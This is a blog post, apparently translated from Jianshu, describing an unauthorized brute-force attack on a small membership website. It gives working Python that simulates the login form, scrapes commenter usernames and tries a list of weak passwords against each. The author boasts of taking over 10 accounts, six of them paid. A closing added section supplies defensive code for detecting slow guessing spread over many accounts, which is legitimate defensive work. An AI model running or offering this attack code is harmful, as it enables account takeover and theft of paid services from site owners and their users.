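Python tricks | Brute-forcing a membership website with Python
This morning, while browsing around as usual, I came across a very interesting author on Jianshu whose ID is 爺是奧巴馬. The articles are out of the ordinary too: the very first one brute-forces someone else's website...
Original post: Brute-forcing a membership website with Python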
————————————————————————————————
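During the summer holiday I was at home online when a friend in a QQ group told me he wanted a membership on a certain website (PS: it is a small site). In the spirit of being helpful, I went to scope it out...
And then I had an idea (a trick).
First, the approach: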
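1. Register a user and log in
2. Capture the traffic with Fiddler
3. Simulate the login with Python
4. Scrape the usernames of commenters from the comment sections
5. Brute-force the logins with weak passwords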
The login page looks like this:
Capturing traffic with Fiddler
After capturing the traffic, I found the following fields:
```
"log": "admin",  # username
"pwd": "admin",  # password
"wp-submit": "登錄",
"redirect_to": "",
"wpuf_login": "true",
"action": "login",
"_wpnonce": "4b4e82f670",
"_wp_http_referer": "/%e7%99%bb%e5%bd%95?loggedout=true"
```
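Only the username and password differ; everything else stays the same.
Simulating the login with Python
This part is fairly simple; it uses the requests module.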
```python
import re
import requests


def baopo(log):
    url = "http://XXXXXX.com/%e7%99%bb%e5%bd%95"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Referer": "http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true"  # site name masked
    }
    data = {
        "log": log,
        "pwd": "admin",
        "wp-submit": "登錄",
        "redirect_to": "",
        "wpuf_login": "true",
        "action": "login",
        "_wpnonce": "4b4e82f670",
        "_wp_http_referer": "/%e7%99%bb%e5%bd%95?loggedout=true"
    }
    a = requests.post(url, headers=headers, data=data)
    # An empty redirect history means the login was not followed by a redirect
    if a.history == []:
        return False
    else:
        return True
```
Getting the usernames
This part mainly just needs matching with the regex module.
```python
import re
import requests


def gethtml(url):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Referer": "http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true"
    }
    html = requests.get(url, headers=headers)
    return html.text


for i in range(30, 36):
    if i == 1:
        url = "http://XXXXXX.com/"
    else:
        url = "http://XXXXXXX.com/page/" + str(i)
    html = gethtml(url)
    # Links to the individual posts on this listing page
    for each in re.findall('<a href="(.*?)" class="zoom" rel="bookmark"', html):
        print(each)
        if int(each[-4:].replace("/", "").replace("s", "")) < 100:
            # Commenter names appear as <strong>name</strong>: in the post page
            for each2 in re.findall("<strong>(.*?)</strong>:", gethtml(each)):
                if "href" in each2:
                    each2 = re.findall('class="url">(.*?)</a>', each2)[0]
                f = open("yonghu.txt", "a+", encoding="utf-8")
                f.write(each2)
                f.write("\n")
                f.close()
                print(each2)
```
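The usernames obtained are saved in the file yonghu.txt.
Starting the brute force
I originally wanted to add multithreading, but because the site is so poor that it throttles requests that come too fast, I gave up on that...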
```python
import requests
import multiprocessing


def baopo(log):
    url = "http://XXXXX.com/%e7%99%bb%e5%bd%95"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Referer": "http://XXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true"
    }
    pwd = ["000000", "111111", "11111111", "112233", "123123", "123321", "123456",
           "12345678", "654321", "666666", "888888", "abcdef", "abcabc",
           "abc123", "a1b2c3", "aaa111", "123qwe", "qwerty", "qweasd", "admin",
           "password", "p@ssword", "passwd", "iloveyou", "5201314", "88888888",
           "147258369", "1234567890"]
    pwd.append(log)  # also try the username itself as the password
    for each in pwd:
        print("using>>>" + each)
        data = {
            "log": log,
            "pwd": each,
            "wp-submit": "登錄",
            "redirect_to": "",
            "wpuf_login": "true",
            "action": "login",
            "_wpnonce": "4b4e82f670",
            "_wp_http_referer": "/%e7%99%bb%e5%bd%95?loggedout=true"
        }
        a = requests.post(url, headers=headers, data=data)
        if a.history == []:
            continue
        else:
            f = open("success.txt", "a+", encoding="utf-8")
            f.write("User:")
            f.write(log)
            f.write(" Passwd:")
            f.write(each)
            f.close()
            print("succeed!\n")
            return True


f = open("yonghu.txt", "r", encoding="utf-8")
yonghuming = set()
yonghuming.add("adminn")
for line in f.readlines():
    line = line.strip()
    yonghuming.add(line)

if __name__ == "__main__":
    for each in yonghuming:
        # p = multiprocessing.Process(target=baopo, args=(each,))
        # p.start()
        print(each)
        baopo(each)
# print(yonghuming)
```
Screenshot of the run
Results
I left it running on a server overnight and it cracked 10 accounts, 6 of which had paid for membership. Sweet.
————————————————————————————————
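Seen from the site operator's side, the post shows why a limit on request speed alone did not stop this: the guesses were slow, came from one client, and were spread across many accounts. The following is an added example, not code from the original post or from the site, of detection logic for that pattern; the log format, thresholds and all names in it are assumptions, and the events are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def parse(line):
    # Assumed log format: "<ISO time> <source IP> <username> <OK|FAIL>"
    ts, ip, user, outcome = line.split()
    return datetime.fromisoformat(ts), ip, user, outcome == "OK"

def detect_guessing(lines, window=timedelta(hours=1), min_failures=10, min_users=3):
    """Flag IPs with many windowed failures over several accounts, plus any later logins."""
    events = sorted(parse(l) for l in lines if l.strip())
    recent, flagged = defaultdict(deque), {}
    for ts, ip, user, ok in events:
        if ok:
            continue
        q = recent[ip]
        q.append((ts, user))
        while ts - q[0][0] > window:      # age out failures older than the window
            q.popleft()
        users = {u for _, u in q}
        if len(q) >= min_failures and len(users) >= min_users:
            entry = flagged.setdefault(ip, {"targets": set(), "compromised": set()})
            entry["targets"] |= users
    failed = defaultdict(set)
    for ts, ip, user, ok in events:       # second pass: a success after failures
        if ip not in flagged:
            continue
        if not ok:
            failed[ip].add(user)
        elif user in failed[ip]:
            flagged[ip]["compromised"].add(user)   # candidate for a forced reset
    return flagged

def constructed_sample():
    """Constructed events: one IP guesses every 20 s per account; one user mistypes once."""
    t, lines = datetime(2017, 8, 1, 1, 0, 0), []
    for user, hit in (("alice", None), ("bob", 3), ("carol", None)):
        for attempt in range(6):
            ok = attempt == hit
            lines.append(f"{t.isoformat()} 203.0.113.7 {user} {'OK' if ok else 'FAIL'}")
            t += timedelta(seconds=20)
            if ok:
                break
    lines += ["2017-08-01T01:02:00 198.51.100.20 dave FAIL",
              "2017-08-01T01:02:30 198.51.100.20 dave OK"]
    return lines

if __name__ == "__main__":
    print(detect_guessing(constructed_sample()))
```

With a 60-second window the same events flag nothing, which is the gap a purely speed-based limit leaves open.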